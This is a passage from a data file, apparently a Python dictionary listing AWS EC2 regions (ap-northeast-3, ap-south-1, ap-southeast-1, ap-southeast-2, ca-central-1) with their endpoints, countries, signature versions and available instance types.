"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"ap-northeast-3": {
"api_name": "ec2_ap_northeast",
"country": "Japan",
"endpoint": "ec2.ap-northeast-3.amazonaws.com",
"id": "ap-northeast-3",
"instance_types": [],
"signature_version": "4",
},
"ap-south-1": {
"api_name": "ec2_ap_south_1",
"country": "India",
"endpoint": "ec2.ap-south-1.amazonaws.com",
"id": "ap-south-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"ap-southeast-1": {
"api_name": "ec2_ap_southeast",
"country": "Singapore",
"endpoint": "ec2.ap-southeast-1.amazonaws.com",
"id": "ap-southeast-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"ap-southeast-2": {
"api_name": "ec2_ap_southeast_2",
"country": "Australia",
"endpoint": "ec2.ap-southeast-2.amazonaws.com",
"id": "ap-southeast-2",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"ca-central-1": {
"api_name": "ec2_ca_central_1",
"country": "Canada",
"endpoint": "ec2.ca-central-1.amazonaws.com",
"id": "ca-central-1",
"instance_types": [
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
